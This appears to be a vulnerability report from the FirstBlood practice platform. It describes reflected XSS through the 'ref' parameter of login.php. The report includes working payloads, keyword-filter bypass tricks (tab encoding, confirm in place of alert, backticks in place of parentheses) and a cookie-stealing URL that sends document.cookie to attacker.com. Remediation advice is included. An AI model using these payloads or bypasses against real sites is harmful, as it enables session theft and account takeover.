FirstBlood-#154 — Reflective XSS on /login.php endpoint through the vulnerable `ref` parameter
This issue was discovered on FirstBlood v1
On 2021-05-10, holybugx Level 5 reported:
Description
Hello Sean,
I found out that there is a reflected XSS on the /login.php endpoint through the vulnerable ref parameter, which leads to account takeover.
Steps to reproduce
- Open the following link: http://firstbloodhackers.com/login.php?action=login&ref=ja%09vascript:confirm`1`
- Click on "Return to previous page" and the XSS pops up.
Filter bypass
I found out that certain keywords are being blocked and removed. I realized the javascript keyword is being removed, so I tried a couple of encoding tricks such as java%09script, but then I realized that with this payload the java keyword is removed. I also realized that the alert keyword and ( are being removed.
I used the following tricks to bypass the filtering:
- javascript --> ja%09vascript
- alert --> confirm
- ( ) --> ``
Bypass explanation
- You can use multiple encoding/unicoding tricks to bypass the javascript keyword being removed; examples of such are:
  ja%09vascript
  ja%0avascript
  ja%0dvascript
- You can use confirm or prompt if keywords such as alert are blocked.
- When parentheses are filtered you can either use ` ` as I did, or in some cases you can use encoding tricks such as HTML encoding or URL encoding/double URL encoding:
  confirm(1) --> confirm`1`
Exploitation
An attacker can craft a payload to steal cookies; an example of such a payload is:
http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60
Where http://attacker.com is the attacker's domain, opening the above link and clicking on "Return to previous page" results in a redirection to the attacker's domain, and the cookies will be sent to the attacker's server. An attacker can set this cookie in his browser to access drAdmin (Administrator).
This happens because of two cookie misconfigurations:
- Cookies are not set as httponly, which makes it possible for an attacker to steal cookies using javascript.
- Cookies are not deleted/expired as they are meant to be after logging out, which makes it possible for an attacker to re-use the cookies whenever he wants to.
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Remediation
- The ref parameter should not be controlled by users.
- Preferably set httponly cookies so that javascript cannot be used to steal cookies.
Impact
- Account takeover
Best regards,
HolyBugx
P3 Medium
Parameter:
Payload:
FirstBlood ID: 3
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on login.php. The developer has tried to prevent a malicious actor from redirecting to a javascript URI but the attempt to stop this was poor and thus it can be bypassed.